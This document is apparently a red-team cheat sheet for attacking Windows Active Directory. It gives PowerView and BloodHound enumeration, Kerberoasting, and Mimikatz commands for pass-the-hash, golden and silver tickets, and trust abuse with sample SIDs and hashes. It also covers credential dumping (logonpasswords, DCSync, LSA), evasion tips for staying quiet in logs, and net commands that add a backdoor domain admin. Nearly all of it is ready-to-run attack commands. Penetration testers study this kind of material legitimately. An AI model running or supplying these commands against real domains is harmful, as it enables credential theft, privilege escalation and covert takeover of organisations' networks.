Cheat Sheet

Table of contents

• Enumeration
  • AD Enumeration With PowerView
• Lateral Movement
  • Lateral Movement Enumeration With PowerView
  • BloodHound
  • Kerberoasting
    • Automatic
  • Lateral Movement with Mimikatz
  • Abusing domain trust
  • Using domain trust key
  • Using krbtgt hash
  • Abusing inter-forest trust
• Post exploitation
  • Dumping OS credentials with Mimikatz
  • Windows commands

Enumeration

AD Enumeration With PowerView

Though the below gives a good reperesentation of the commands that usually come in most useful for me, this only scratches the surface of what PowerView can do. PowerView is available here.

# Get all users in the current domain
Get-DomainUser | select -ExpandProperty cn

# Get all computers in the current domain
Get-DomainComputer

# Get all domains in current forest
Get-ForestDomain

# Get domain/forest trusts
Get-DomainTrust
Get-ForestTrust

# Get information for the DA group
Get-DomainGroup "Domain Admins"

# Find members of the DA group
Get-DomainGroupMember "Domain Admins" | select -ExpandProperty membername

# Find interesting shares in the domain, ignore default shares, and check access
Find-DomainShare -ExcludeStandard -ExcludePrint -ExcludeIPC -CheckShareAccess

# Get OUs for current domain
Get-DomainOU -FullData

# Get computers in an OU
# %{} is a looping statement
Get-DomainOU -name Servers | %{ Get-DomainComputer -SearchBase $_.distinguishedname } | select dnshostname

# Get GPOs applied to a specific OU
Get-DomainOU *WS* | select gplink
Get-DomainGPO -Name "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}"

# Get Restricted Groups set via GPOs, look for interesting group memberships forced via domain
Get-DomainGPOLocalGroup -ResolveMembersToSIDs | select GPODisplayName, GroupName, GroupMemberOf, GroupMembers

# Get the computers where users are part of a local group through a GPO restricted group
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName

# Find principals that can create new GPOs in the domain
Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=targetdomain,DC=com" -ResolveGUIDs | ?{ $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier

# Find principals that can link GPOs to OUs
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier

# Get incoming ACL for a specific object
Get-DomainObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | Select IdentityReference,ActiveDirectoryRights

# Find interesting ACLs for the entire domain, show in a readable (left-to-right) format
Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft

# Get interesting outgoing ACLs for a specific user or group
# ?{} is a filter statement
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "Domain Admins"} | select ObjectDN,ActiveDirectoryRights

Lateral Movement

Lateral Movement Enumeration With PowerView

# Look for kerberoastable users
Get-DomainUser -SPN | select name,serviceprincipalname

BloodHound

Use Invoke-BloodHound from SharpHound.ps1, or use SharpHound.exe.
Both can be run reflectively, get them here. Examples below use the PowerShell variant but arguments are identical.

# Run all checks, including restricted groups enforced through the domain
Invoke-BloodHound -CollectionMethod All,GPOLocalGroup

# Running LoggedOn separately sometimes gives you more sessions, but enumerates by looping through hosts so is VERY noisy
Invoke-BloodHound -CollectionMethod LoggedOn

Kerberoasting

Automatic

With PowerView:

Get-DomainSPNTicket -SPN "MSSQLSvc/sqlserver.targetdomain.com"

Lateral Movement with Mimikatz

Note that Mimikatz is incredibly versatile and is discussed in multiple sections throughout this blog. Because of this, however, the binary is also very well-detected. If you need to run Mimikatz on your target (not recommended), executing a custom version reflectively is your best bet.

# Overpass-the-hash (more risky than Rubeus, writes to LSASS memory)
sekurlsa::pth /user:Administrator /domain:targetdomain.com /ntlm:[NTLMHASH] /run:powershell.exe

# Or, a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands
sekurlsa::pth /user:Administrator /domain:targetdomain.com /aes256:[AES256KEY] /run:powershell.exe

# Golden ticket (domain admin, w/ some ticket properties to avoid detection)
kerberos::golden /user:Administrator /domain:targetdomain.com /sid:S-1-5-21-[DOMAINSID] /krbtgt:[KRBTGTHASH] /id:500 /groups:513,512,520,518,519 /startoffset:0 /endin:600 /renewmax:10080 /ptt

# Silver ticket for a specific SPN with a compromised service / machine account
kerberos::golden /user:Administrator /domain:targetdomain.com /sid:S-1-5-21-[DOMAINSID] /rc4:[MACHINEACCOUNTHASH] /target:dc.targetdomain.com /service:HOST /id:500 /groups:513,512,520,518,519 /startoffset:0 /endin:600 /renewmax:10080 /ptt

Abusing domain trust

All commands must be run with DA privileges in the current domain.

Note that if you completely compromise a child domain (currentdomain.targetdomain.com), you can by definition also compromise the parent domain (targetdomain.com) due to the implicit trust relationship. The same counts for any trust relationship where SID filtering is disabled (see ‘Abusing inter-forest trust’ below).

Using domain trust key

From the DC, dump the hash of the currentdomain\targetdomain$ trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using Mimikatz, adding the SID for the target domain’s enterprise admins group to our ‘SID history’.

kerberos::golden /domain:currentdomain.targetdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:targetdomain.com /ticket:c:\users\public\ticket.kirbi

We can now DCSync the target domain (see below).

Using krbtgt hash

From the DC, dump the krbtgt hash using e.g. DCSync or LSADump. Then, using this hash, forge an inter-realm TGT using Mimikatz, as with the previous method.

Doing this requires the SID of the current domain as the /sid parameter, and the SID of the target domain as part of the /sids parameter. You can grab these using PowerView’s Get-DomainSID. Use a SID History (/sids) of *-516 and S-1-5-9 to disguise as the Domain Controllers group and Enterprise Domain Controllers respectively, to be less noisy in the logs.

kerberos::golden /domain:currentdomain.targetdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /user:DC$ /groups:516 /ptt

If you are having issues creating this ticket, try adding the ‘target’ flag, e.g. /target:targetdomain.com.

Alternatively, generate a domain admin ticket with SID history of enterprise administrators group in the target domain.

kerberos::golden /user:Administrator /domain:currentdomain.targetdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /sids:S-1-5-21-280534878-1496970234-700767426-519 /ptt

We can now immediately DCSync the target domain, or get a reverse shell using e.g. scheduled tasks.

Abusing inter-forest trust

Since a forest is a security boundary, we can only access domain services that have been shared with the domain we have compromised (our source domain). Use e.g. BloodHound to look for users that have an account (with the same username) in both forests and try password re-use. Additionally, we can use BloodHound or PowerView to hunt for foreign group memberships between forests. The PowerView command:

Get-DomainForeignGroupMember -domain targetdomain.com

In some cases, it is possible that SID filtering (the protection causing the above), is disabled between forests. If you run Get-DomainTrust and you see the TREAT_AS_EXTERNAL property, this is the case! In this case, you can abuse the forest trust like a domain trust, as described above. Note that you still can NOT forge a ticket for any SID between 500 and 1000 though, so you can’t become DA (not even indirectly through group inheritance). In this case, look for groups that grant e.g. local admin on the domain controller or similar non-domain privileges. For more information, refer to this blog post.

To impersonate a user from our source domain to access services in a foreign domain, we can do the following. Extract inter-forest trust key as in ‘Using domain trust key’ above.

Use Mimikatz to generate a TGT for the target domain using the trust key:

Kerberos::golden /user:Administrator /service:krbtgt /domain:currentdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 /target:targetdomain.com /rc4:fe8884bf222153ca57468996c9b348e9 /ticket:ticket.kirbi

Post exploitation

Dumping OS credentials with Mimikatz

# Dump logon passwords
sekurlsa::logonpasswords

# Dump all domain hashes from a DC
## Note: Everything with /patch is noisy as heck since it writes to LSASS 🚩
lsadump::lsa /patch

# Dump only local users
lsadump::sam

# DCSync (requires 'ldap' SPN)
lsadump::dcsync /user:DOMAIN\krbtgt /domain:targetdomain.com

# Dump Windows secrets, such as stored creds for scheduled tasks (elevate first) 🚩
vault::list
vault::cred /patch

# Dump Kerberos encryption keys, including the AES256 key for better opsec (see 'Lateral Movement with Rubeus' section)
sekurlsa::ekeys

Windows commands

whoami /priv
net user user Password123! /ADD
net group "Admins du domaine" user /ADD /DOMAIN
net group "Administrateurs de l'entreprise" user /ADD /DOMAIN